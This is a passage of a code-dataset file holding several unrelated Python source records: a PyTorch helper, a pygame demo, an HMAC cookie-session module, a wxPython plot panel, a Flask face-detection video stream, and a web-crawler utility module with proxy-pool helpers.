x.to(torch.device(\"cpu\")).data.numpy()\n elif isinstance(x, tuple):\n return np.asarray(x, dtype=x.dtype)\n else:\n raise TypeError(\n \"_make_numpy_array only accepts input types of numpy.ndarray, scalar,\"\n \" and Torch Tensor, while received type {}\".format(str(type(x)))\n )\n", "sub_path": "smdebug/pytorch/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 1768, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "numpy.ndarray", "line_number": 11, "usage_type": "attribute"}, {"api_name": "smdebug.core.reductions.get_numpy_reduction", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.abs", "line_number": 14, "usage_type": "call"}, {"api_name": "smdebug.core.reduction_config.ALLOWED_REDUCTIONS", "line_number": 16, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 19, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 20, "usage_type": "attribute"}, {"api_name": "smdebug.core.reduction_config.ALLOWED_NORMS", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.norm", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 40, "usage_type": "attribute"}, {"api_name": "numpy.isscalar", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 44, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 47, "usage_type": "call"}]}
+{"seq_id": "253836064", "text": "import pygame\ndef main():\n #创建游戏窗口\n screen = pygame.display.set_mode((1250,750),0,32)\n #把本地文件夹的图片,获取倒 代码中\n background = pygame.image.load('./images/mm2.jpg')\n bad = pygame.image.load('./images/mm.jpg')\n #把图片加载倒游戏窗口上\n #screen.blit(background,(0,0))\n rect = pygame.Rect(-210,0,320,320)\n\n clock=pygame.time.Clock()#获得游戏时钟 控制器\n #刷新显示\n #pygame.display.update()\n #防止一闪而退\n while True:\n screen.blit(background,(0,0))\n screen.blit(bad,rect)\n #刷新显示\n #游戏事件的监听\n for event in pygame.event.get():\n print('event.type=',event.type)\n print('event=',event)\n if event.type == pygame.QUIT:#退出游戏\n print('游戏退出')\n pygame.quit()\n exit()#退出程序\n\n rect.x -= 150\n pygame.display.update()\n clock.tick(30)\n'''\nfeiji = pygame.Rect(100,500,50,50)\nprint('x=',feiji.x)\nprint('y=',feiji.y)\nprint('width=',feiji.width)\nprint('height=',feiji.height)\n'''\nif __name__== '__main__':\n main()\n", "sub_path": "第二月/于亮p12/飞机大战.py", "file_name": "飞机大战.py", "file_ext": "py", "file_size_in_byte": 1180, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "pygame.display.set_mode", "line_number": 4, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 4, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 6, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 6, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 7, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 7, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 10, "usage_type": "call"}, {"api_name": "pygame.time.Clock", "line_number": 12, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 26, "usage_type": "call"}, {"api_name": "pygame.display.update", "line_number": 30, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 30, "usage_type": "attribute"}]}
+{"seq_id": "156202570", "text": "from .helpers import izip, want_bytes, want_text\nimport base64\nimport hashlib\nimport hmac\nimport json\n\n\ndef b64e_raw(data):\n return want_text(base64.urlsafe_b64encode(data).rstrip(b'='))\n\n\ndef b64d_raw(data):\n data += u'=' * (-len(data) % 4)\n return base64.urlsafe_b64decode(want_bytes(data))\n\n\ndef _constant_time_compare(a, b):\n \"\"\"Returns True if the two strings are equal, False otherwise.\n\n The time taken is independent of the number of characters that match.\n\n For the sake of simplicity, this function executes in constant time only\n when the two strings have the same length. It short-circuits when they\n have different lengths.\n\n This is an alias of :func:`hmac.compare_digest` on Python>=2.7,3.3.\n \"\"\"\n a = want_bytes(a)\n b = want_bytes(b)\n if len(a) != len(b):\n return False\n result = 0\n for x, y in izip(bytearray(a), bytearray(b)):\n result |= x ^ y\n return result == 0\n\n\ndef safe_str_cmp(a, b):\n a = want_bytes(a)\n b = want_bytes(b)\n return getattr(hmac, 'compare_digest', _constant_time_compare)(a, b)\n\n\ndef get_hmac(key, data):\n k = hmac.new(key, b'malt-session', hashlib.sha256).digest()\n sig = hmac.new(k, data, hashlib.sha256).digest()\n return b64e_raw(sig)\n\n\ndef sign(key, data):\n return data + u'.' + get_hmac(key, want_bytes(data))\n\n\ndef unsign(key, data):\n if u'.' not in data:\n return None\n payload, sig = data.rsplit(u'.', 1)\n\n correct_sig = get_hmac(key, want_bytes(payload))\n if not safe_str_cmp(sig, correct_sig):\n return None\n\n return payload\n\n\ndef get_key(request):\n if 'SECRET_KEY' not in request.config:\n raise Exception(\"You must set config['SECRET_KEY'] to use sessions\")\n return want_bytes(request.config['SECRET_KEY'])\n\n\ndef open_session(request):\n key = get_key(request)\n cookie_name = request.config.get('SESSION_COOKIE_NAME', 'session')\n session_cookie = request.cookies.get(cookie_name)\n\n if session_cookie is None:\n return {}\n\n encoded = unsign(key, session_cookie)\n if encoded is None:\n return {}\n else:\n return json.loads(want_text(b64d_raw(encoded)))\n\n\ndef save_session(request, response):\n # We want the JSON to be small, and consistent (keys in sorted order)\n as_json = json.dumps(request.session, separators=(',', ':'),\n sort_keys=True)\n # Create the signed session cookie\n encoded = b64e_raw(want_bytes(as_json))\n session_cookie = sign(get_key(request), encoded)\n # Set the cookie\n cookie_name = request.config.get('SESSION_COOKIE_NAME', 'session')\n response.set_cookie(cookie_name, session_cookie)\n return response\n", "sub_path": "malt/sessions.py", "file_name": "sessions.py", "file_ext": "py", "file_size_in_byte": 2681, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "helpers.want_text", "line_number": 9, "usage_type": "call"}, {"api_name": "base64.urlsafe_b64encode", "line_number": 9, "usage_type": "call"}, {"api_name": "base64.urlsafe_b64decode", "line_number": 14, "usage_type": "call"}, {"api_name": "helpers.want_bytes", "line_number": 14, "usage_type": "call"}, {"api_name": "helpers.want_bytes", "line_number": 28, "usage_type": "call"}, {"api_name": "helpers.want_bytes", "line_number": 29, "usage_type": "call"}, {"api_name": "helpers.izip", "line_number": 33, "usage_type": "call"}, {"api_name": "helpers.want_bytes", "line_number": 39, "usage_type": "call"}, {"api_name": "helpers.want_bytes", "line_number": 40, "usage_type": "call"}, {"api_name": "hmac.new", 
"line_number": 45, "usage_type": "call"}, {"api_name": "hashlib.sha256", "line_number": 45, "usage_type": "attribute"}, {"api_name": "hmac.new", "line_number": 46, "usage_type": "call"}, {"api_name": "hashlib.sha256", "line_number": 46, "usage_type": "attribute"}, {"api_name": "helpers.want_bytes", "line_number": 51, "usage_type": "call"}, {"api_name": "helpers.want_bytes", "line_number": 59, "usage_type": "call"}, {"api_name": "helpers.want_bytes", "line_number": 69, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 84, "usage_type": "call"}, {"api_name": "helpers.want_text", "line_number": 84, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 89, "usage_type": "call"}, {"api_name": "helpers.want_bytes", "line_number": 92, "usage_type": "call"}]}
+{"seq_id": "641444084", "text": "# uncompyle6 version 3.7.4\n# Python bytecode 2.5 (62131)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-i686/egg/epscApp/plotPanel.py\n# Compiled at: 2009-05-29 13:49:10\nimport wx, sys\nfrom SCMPanel import SCMPanel\n\nclass PlotPanel(wx.Panel, SCMPanel):\n \"\"\" panel for plotting\n \"\"\"\n\n def __init__(self, *args, **kwds):\n SCMPanel.__init__(self, *args, **kwds)\n wx.Panel.__init__(self, *args, **kwds)\n self.sizer_4_staticbox = wx.StaticBox(self, -1, 'Neutron')\n self.sizer_3_staticbox = wx.StaticBox(self, -1, 'Macro')\n self.macroModelCheck = wx.CheckBox(self, -1, 'Model Result')\n self.macroExpCheck = wx.CheckBox(self, -1, 'Experiment Data')\n self.neutronModelCheck = wx.CheckBox(self, -1, 'Model Result')\n self.neutronExpCheck = wx.CheckBox(self, -1, 'Experiment Data')\n self.macroModelCheck.SetValue(True)\n self.macroExpCheck.SetValue(True)\n self.neutronModelCheck.SetValue(True)\n self.neutronExpCheck.SetValue(True)\n self.static_line_1 = wx.StaticLine(self, -1)\n self.plotButton = wx.Button(self, -1, 'Plot')\n self.resetButton = wx.Button(self, -1, 'Reset')\n self.gauge = wx.Gauge(self, -1, 50, (110, 95), (210, 20))\n self.__set_properties()\n self.__do_layout()\n self.Bind(wx.EVT_BUTTON, self.onPlot, self.plotButton)\n self.Bind(wx.EVT_BUTTON, self.onReset, self.resetButton)\n\n def __set_properties(self):\n pass\n\n def __do_layout(self):\n sizer_1 = wx.BoxSizer(wx.VERTICAL)\n sizer_2 = wx.BoxSizer(wx.HORIZONTAL)\n sizer_6 = wx.BoxSizer(wx.HORIZONTAL)\n sizer_4 = wx.StaticBoxSizer(self.sizer_4_staticbox, wx.VERTICAL)\n sizer_3 = wx.StaticBoxSizer(self.sizer_3_staticbox, wx.VERTICAL)\n sizer_3.Add(self.macroModelCheck, 1, wx.LEFT | wx.ADJUST_MINSIZE, 10)\n sizer_3.Add(self.macroExpCheck, 1, wx.LEFT | wx.ADJUST_MINSIZE, 10)\n sizer_1.Add(sizer_3, 1, wx.EXPAND, 10)\n sizer_4.Add(self.neutronModelCheck, 1, wx.LEFT | wx.ADJUST_MINSIZE | wx.EXPAND, 10)\n sizer_4.Add(self.neutronExpCheck, 1, wx.LEFT | wx.ADJUST_MINSIZE | wx.EXPAND, 10)\n sizer_1.Add(sizer_4, 1, wx.EXPAND, 10)\n sizer_1.Add(sizer_6, 1, wx.EXPAND, 0)\n sizer_1.Add(self.static_line_1, 0, wx.BOTTOM | wx.EXPAND, 5)\n sizer_2.Add(self.plotButton, 0, wx.BOTTOM | wx.LEFT | wx.RIGHT | wx.ADJUST_MINSIZE, 5)\n sizer_2.Add(self.resetButton, 0, wx.BOTTOM | wx.LEFT | wx.RIGHT | wx.ADJUST_MINSIZE, 5)\n sizer_1.Add(sizer_2, 0, wx.EXPAND, 0)\n sizer_1.Add(self.gauge, 0, wx.EXPAND, 0)\n self.SetAutoLayout(True)\n self.SetSizer(sizer_1)\n\n def enableWidgets(self, on=True):\n \"\"\"Enable or disable the widgets.\"\"\"\n self.macroDataList.Enable(on)\n self.neutronDataList.Enable(on)\n self.resetButton.Enable(on)\n self.plotButton.Enable(on)\n\n def onPlot(self, event):\n \"\"\"Plot some stuff.\"\"\"\n self.Parent.clearPlots()\n self.Parent.OnPlot(None)\n if self.macroModelCheck.GetValue() == True:\n if self.controller.epscData.flagRun == False:\n msg = 'You should run the model to plot!'\n dlg = wx.MessageDialog(self, msg, 'Warning', wx.OK)\n dlg.ShowModal()\n dlg.Destroy()\n return\n if self.macroExpCheck.GetValue() == True:\n self.macro = 2\n else:\n self.macro = 1\n self.controller.plotEngine.plotMacroTop(self.Parent, self.macro)\n elif self.macroExpCheck.GetValue() == True:\n self.macro = 3\n if self.controller.epscData.expData.checkFlagOn('expData'):\n self.controller.plotEngine.plotMacroTop(self.Parent, self.macro)\n else:\n msg = 'You should input the experimental files to plot!'\n dlg = wx.MessageDialog(self, msg, 
'Warning', wx.OK)\n dlg.ShowModal()\n dlg.Destroy()\n return\n else:\n self.macro = 0\n if self.neutronModelCheck.GetValue() == True:\n if self.controller.epscData.flagRun == False:\n msg = 'You should run the model to plot!'\n dlg = wx.MessageDialog(self, msg, 'Warning', wx.OK)\n dlg.ShowModal()\n dlg.Destroy()\n return\n if self.neutronExpCheck.GetValue() == True:\n self.neutron = 2\n else:\n self.neutron = 1\n self.controller.plotEngine.plotNeutronTop(self.Parent, self.neutron)\n elif self.neutronExpCheck.GetValue() == True:\n self.neutron = 3\n if self.controller.epscData.expData.checkFlagOn('expData'):\n if self.controller.epscData.diffractionDataSaved:\n self.controller.plotEngine.plotNeutronTop(self.Parent, self.neutron)\n else:\n msg = 'You should input the diffraction data to plot!'\n dlg = wx.MessageDialog(self, msg, 'Warning', wx.OK)\n dlg.ShowModal()\n dlg.Destroy()\n return\n else:\n msg = 'You should input the experimental files to plot!'\n dlg = wx.MessageDialog(self, msg, 'Warning', wx.OK)\n dlg.ShowModal()\n dlg.Destroy()\n return\n else:\n self.neutron = 0\n return\n\n def onReset(self, event):\n \"\"\"Reset everything.\"\"\"\n self.macroExpCheck.SetValue(False)\n self.macroModelCheck.SetValue(False)\n self.neutronExpCheck.SetValue(False)\n self.neutronModelCheck.SetValue(False)\n\n def _check(self, event):\n try:\n self._plot(None)\n self.plotButton.Enable()\n except ControlConfigError:\n self.plotButton.Disable()\n\n return\n\n def disableButton(self):\n self.plotButton.Enable(False)\n\n def enableButton(self):\n self.plotButton.Enable(True)\n\n\nif __name__ == '__main__':\n app = wx.PySimpleApp()\n wx.InitAllImageHandlers()\n frame = wx.Frame(None, -1, 'dynamic test', size=(800, 900))\n panel = PlotPanel(frame)\n app.SetTopWindow(frame)\n frame.Show()\n app.MainLoop()", "sub_path": "pycfiles/SCM-1.0alpha-py2.5/plotPanel.py", "file_name": "plotPanel.py", "file_ext": "py", "file_size_in_byte": 6396, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "wx.Panel", "line_number": 10, "usage_type": "attribute"}, {"api_name": "SCMPanel.SCMPanel", "line_number": 10, "usage_type": "name"}, {"api_name": "SCMPanel.SCMPanel.__init__", "line_number": 15, "usage_type": "call"}, {"api_name": "SCMPanel.SCMPanel", "line_number": 15, "usage_type": "name"}, {"api_name": "wx.Panel.__init__", "line_number": 16, "usage_type": "call"}, {"api_name": "wx.Panel", "line_number": 16, "usage_type": "attribute"}, {"api_name": "wx.StaticBox", "line_number": 17, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 18, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 19, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 20, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 21, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 22, "usage_type": "call"}, {"api_name": "wx.StaticLine", "line_number": 27, "usage_type": "call"}, {"api_name": "wx.Button", "line_number": 28, "usage_type": "call"}, {"api_name": "wx.Button", "line_number": 29, "usage_type": "call"}, {"api_name": "wx.Gauge", "line_number": 30, "usage_type": "call"}, {"api_name": "wx.EVT_BUTTON", "line_number": 33, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 34, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 40, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 40, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", 
"line_number": 41, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 41, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 42, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 42, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 43, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 43, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 44, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 44, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 45, "usage_type": "attribute"}, {"api_name": "wx.ADJUST_MINSIZE", "line_number": 45, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 46, "usage_type": "attribute"}, {"api_name": "wx.ADJUST_MINSIZE", "line_number": 46, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 47, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 48, "usage_type": "attribute"}, {"api_name": "wx.ADJUST_MINSIZE", "line_number": 48, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 48, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 49, "usage_type": "attribute"}, {"api_name": "wx.ADJUST_MINSIZE", "line_number": 49, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 49, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 50, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 51, "usage_type": "attribute"}, {"api_name": "wx.BOTTOM", "line_number": 52, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 52, "usage_type": "attribute"}, {"api_name": "wx.BOTTOM", "line_number": 53, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 53, "usage_type": "attribute"}, {"api_name": "wx.RIGHT", "line_number": 53, "usage_type": "attribute"}, {"api_name": "wx.ADJUST_MINSIZE", "line_number": 53, "usage_type": "attribute"}, {"api_name": "wx.BOTTOM", "line_number": 54, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 54, "usage_type": "attribute"}, {"api_name": "wx.RIGHT", "line_number": 54, "usage_type": "attribute"}, {"api_name": "wx.ADJUST_MINSIZE", "line_number": 54, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 55, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 56, "usage_type": "attribute"}, {"api_name": "wx.MessageDialog", "line_number": 74, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 74, "usage_type": "attribute"}, {"api_name": "wx.MessageDialog", "line_number": 89, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 89, "usage_type": "attribute"}, {"api_name": "wx.MessageDialog", "line_number": 98, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 98, "usage_type": "attribute"}, {"api_name": "wx.MessageDialog", "line_number": 114, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 114, "usage_type": "attribute"}, {"api_name": "wx.MessageDialog", "line_number": 120, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 120, "usage_type": "attribute"}, {"api_name": "wx.PySimpleApp", "line_number": 152, "usage_type": "call"}, {"api_name": "wx.InitAllImageHandlers", "line_number": 153, "usage_type": "call"}, {"api_name": "wx.Frame", "line_number": 154, "usage_type": "call"}]}
+{"seq_id": "237653674", "text": "import time\nimport cv2\nfrom flask import Flask, render_template, Response, request\nimport json\nimport pika\nfrom flask_cors import CORS, cross_origin\nimport numpy as np\n\napp = Flask(__name__)\ncors = CORS(app)\napp.config['CORS_HEADERS'] = 'Content-Type'\n\nconnection = pika.BlockingConnection()\nchannel = connection.channel()\n\nchannel.queue_declare(queue='counter')\n\n\n@app.route('/')\n@cross_origin()\ndef index():\n return render_template('index.html')\n\n\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n\nprevious_faces_length = 0\nfaceId = 55\n\n\ndef gen(id):\n \"\"\"Video streaming generator function.\"\"\"\n #cap = cv2.VideoCapture('f2.mp4')\n cap = cv2.VideoCapture(0)\n\n # Read until video is completed\n while(cap.isOpened()):\n # Capture frame-by-frame\n\n ret, img = cap.read()\n if ret == True:\n img = cv2.resize(img, (0, 0), fx=0.5, fy=0.5)\n\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n # Detect the faces\n faces = face_cascade.detectMultiScale(gray, 1.2, 4)\n\n # print(\"FACES COUNT: {}\".format(len(faces)))\n # Draw the rectangle around each face\n for (x, y, w, h) in faces:\n cv2.rectangle(img, (x, y), (x+w, y+h), (255, 0, 0), 2)\n\n #global faceId\n\n #print('FaceID: {}'.format(faceId))\n # cv2.imshow('img', img)\n # ovde treba da stoji img\n global previous_faces_length\n\n print('PREV FACES LEN {}'.format(previous_faces_length))\n print('FACES LEN {} '.format(len(faces)))\n\n if id is not None:\n previous_faces_length = 0\n print('ID: {}'.format(id))\n x, y, w, h = faces[int(id)]\n face_to_show = faces = img[-70 +\n y:y + h + 70, -70 + x:x + w + 70]\n frame = cv2.imencode('.jpg', face_to_show)[1].tobytes()\n yield (b'--frame\\r\\n'b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n')\n time.sleep(0.1)\n\n # faces = faces[int(id)]\n previous_faces_length = 0\n else:\n frame = cv2.imencode('.jpg', img)[1].tobytes()\n yield (b'--frame\\r\\n'b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n')\n time.sleep(0.1)\n\n if len(faces) != previous_faces_length:\n # XD\n if (len(faces) > 10):\n continue\n previous_faces_length = len(faces)\n\n # print('Poslato za lice')\n json_payload = json.dumps({'faces': previous_faces_length})\n channel.basic_publish(exchange='',\n routing_key='counter',\n body=json_payload)\n else:\n break\n\n\n@app.route('/video_feed')\n@cross_origin()\ndef video_feed():\n \"\"\"Video streaming route. 
Put this in the src attribute of an img tag.\"\"\"\n id = request.args.get('id')\n\n return Response(gen(id),\n mimetype='multipart/x-mixed-replace; boundary=frame')\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 3208, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "flask.Flask", "line_number": 9, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 10, "usage_type": "call"}, {"api_name": "pika.BlockingConnection", "line_number": 13, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 22, "usage_type": "call"}, {"api_name": "flask_cors.cross_origin", "line_number": 20, "usage_type": "call"}, {"api_name": "cv2.CascadeClassifier", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 42, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 44, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 44, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 51, "usage_type": "call"}, {"api_name": "cv2.imencode", "line_number": 69, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 71, "usage_type": "call"}, {"api_name": "cv2.imencode", "line_number": 76, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 78, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 87, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 99, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 99, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 99, "usage_type": "name"}, {"api_name": "flask.Response", "line_number": 101, "usage_type": "call"}, {"api_name": "flask_cors.cross_origin", "line_number": 96, "usage_type": "call"}]}
+{"seq_id": "127396055", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\"\"\"\n@author: Alex\n@date: 2020/04/23 08:46:25\n@file: common_requests.py\n@usage: 工具方法,随机睡眠, 去除特殊字符等\n\"\"\"\nimport sys\nsys.setdefaultencoding('utf-8')\nsys.path.append('/home/work/data/crawler3/crawler3_py/develop_jobs')\n\nimport chardet\nimport hashlib\nimport json\nimport random\nimport re\nimport six\nimport time\n\nimport requests\n\nfrom common_tools import config, exception\n\n\nDATE_PATTERN = re.compile('(\\d{4}[-/年.]\\d{1,2}[-/月.]\\d{1,2}日?)')\nTIME_PATTERN = re.compile('(\\d{1,2}[时|:]\\d{1,2}[分|:]?(\\d{1,2}秒?)?)')\nSECOND_PATTERN = re.compile(r'\\d{1,2}:\\d{1,2}:\\d{1,2}')\nMINUTE_PATTERN = re.compile(r'\\d{1,2}:\\d{1,2}')\nIP_PATTERN = re.compile(r'(\\d+\\.\\d+\\.\\d+\\.\\d+)')\n\n\ndef random_sleep_time(start=1, stop=5):\n \"\"\"\n 随机睡眠\n :param start: 最少时间,默认1\n :param stop: 最大时间,默认5\n :return:\n \"\"\"\n if not (isinstance(start, int) and isinstance(stop, int)):\n raise TypeError('start or stop value must be a integer.')\n if start > stop:\n raise ValueError('start value must be less than stop value.')\n # assert isinstance(start, int), 'start must be a integer.'\n # assert isinstance(stop, int), 'stop must be a integer.'\n # assert start <= stop, 'start value must be less than stop value.'\n\n time.sleep(random.randint(start, stop))\n\n\ndef make_md5(text):\n \"\"\"\n 对字符串进行md5加密\n :param text:\n :return:\n \"\"\"\n md5_text = hashlib.md5(text.encode('utf-8')).hexdigest()\n return md5_text\n\n\ndef make_sha256(text):\n \"\"\"\n 对字符串进行sha256加密\n :param text:\n :return:\n \"\"\"\n sha256_text = hashlib.sha256(text.encode('utf-8')).hexdigest()\n return sha256_text\n\n\ndef replace_escape_chars(text, which_ones=('\\n', '\\t', '\\r',u'\\u3000',u'\\xa0','\\v',' '), replace_by=u'', encoding=None):\n \"\"\"\n #去除\\n,\\t,\\r等特殊字符\n \"\"\"\n def to_unicode(text, encoding=None, errors='strict'):\n if isinstance(text, six.text_type):\n return text\n if not isinstance(text, (bytes, six.text_type)):\n raise TypeError('to_unicode must receive a bytes, str or unicode '\n 'object, got %s' % type(text).__name__)\n if encoding is None:\n encoding = 'utf-8'\n return text.decode(encoding, errors)\n \n text = to_unicode(text, encoding)\n for ec in which_ones:\n text = text.replace(ec, replace_by)\n return text\n\n\ndef get_zhima_proxy():\n \"\"\"\n 获取芝麻代理\n :return:\n \"\"\"\n try:\n res = requests.get(url=config.PROXY_GET_URL).json()\n if res.get('code') == 0:\n return res.pop('proxies')\n else:\n raise exception.GetProxyError('proxy pool error, please check')\n except Exception as ex:\n raise exception.GetProxyError('get zhima proxy error, {}'.format(ex))\n\n\ndef put_zhima_proxy(proxy, is_failed=False):\n \"\"\"\n 回收芝麻代理, 将failed_times加一\n :param proxy:\n :param is_failed:\n :return:\n \"\"\"\n try:\n data = {\n 'proxies': proxy,\n 'is_failed': is_failed\n }\n res = requests.post(url=config.PROXY_PUT_URL, json=data).json()\n if res.get('code') != 0:\n raise exception.PutProxyError('proxy pool error, please check')\n except Exception as ex:\n raise exception.PutProxyError('put zhima proxy error, {}'.format(ex))\n\n\ndef get_zhima_ip(num=1):\n \"\"\"\n 从芝麻站点获取IP\n :param num:\n :return:\n \"\"\"\n try:\n proxy_url = re.sub(r'num=\\d+', r'num={}'.format(num), config.ZHIMA_PROXY_URL)\n response = requests.get(url=proxy_url, headers=config.DEFAULT_HEADERS)\n if '\"success\":false' not in response.text:\n temps = response.text.strip('\\r\\n').split('\\r\\n')\n ip_list = []\n for temp in temps:\n proxy = {}\n 
proxy['http'] = 'http://{}'.format(temp)\n proxy['https'] = 'https://{}'.format(temp)\n ip_list.append(proxy)\n return ip_list\n raise exception.GetProxyError('get zhima proxy error, {}'.format(response.text))\n except Exception as ex:\n raise exception.GetProxyError('get zhima proxy error, {}'.format(ex))\n\n\ndef add_zhima_white(response):\n try:\n ip_addr = ''.join(IP_PATTERN.findall(response.text))\n white_url = config.WHITE_URL + ip_addr\n requests.get(url=white_url, headers=config.DEFAULT_HEADERS)\n except Exception as ex:\n raise exception.GetProxyError('requests add zhima white error, {}'.format(ex))\n\n\ndef get_abuyun_proxy():\n \"\"\"\n 设置阿布云代理\n :return:\n \"\"\"\n proxy_meta = \"http://%(user)s:%(pass)s@%(host)s:%(port)s\" % {\n \"host\": config.ABUYUN_PROXY.get('host'),\n \"port\": config.ABUYUN_PROXY.get('port'),\n \"user\": config.ABUYUN_PROXY.get('username'),\n \"pass\": config.ABUYUN_PROXY.get('password'),\n }\n proxies = {\n \"http\": proxy_meta,\n \"https\": proxy_meta,\n }\n return proxies\n\n\ndef get_dobel_proxy():\n \"\"\"\n 设置多贝云代理\n :return:\n \"\"\"\n proxy_meta = \"http://%(user)s:%(pass)s@%(host)s:%(port)s\" % {\n \"host\": config.DOBEL_PROXY.get('host'),\n \"port\": config.DOBEL_PROXY.get('port'),\n \"user\": config.DOBEL_PROXY.get('username'),\n \"pass\": config.DOBEL_PROXY.get('password'),\n }\n proxies = {\n \"http\": proxy_meta,\n \"https\": proxy_meta,\n }\n return proxies\n\n\ndef switch_ip(proxy):\n \"\"\"\n 隧道代理,手动切换IP\n :param proxy:\n :return:\n \"\"\"\n if not proxy:\n raise exception.GetProxyError('switch ip error, proxy is wrong')\n\n proxy_str = json.dumps(proxy)\n if config.ABUYUN_PROXY.get('host') in proxy_str:\n switch_url = config.ABUYUN_SWITCH_IP\n elif config.DOBEL_PROXY.get('host') in proxy_str:\n switch_url = config.DOBEL_SWITCH_IP\n else:\n raise ValueError('switch ip error, proxy value error')\n try:\n requests.get(switch_url, proxies=proxy, headers=config.DEFAULT_HEADERS)\n except requests.RequestException as ex:\n raise exception.GetProxyError('requests switch ip error, {}'.format(ex))\n\n\ndef coding(response):\n \"\"\"\n 设置编码\n :param response:\n :return:\n \"\"\"\n if not isinstance(response, requests.Response):\n raise ValueError('type of response is wrong, must be .')\n\n if config.CHARTSET_RE.findall(response.text):\n response.encoding = config.CHARTSET_RE.findall(response.text)[0]\n elif config.PRAGMA_RE.findall(response.text):\n response.encoding = config.PRAGMA_RE.findall(response.text)[0]\n else:\n temp = chardet.detect(response.content)\n response.encoding = temp['encoding']\n return response\n\n\ndef format_time(time_str):\n 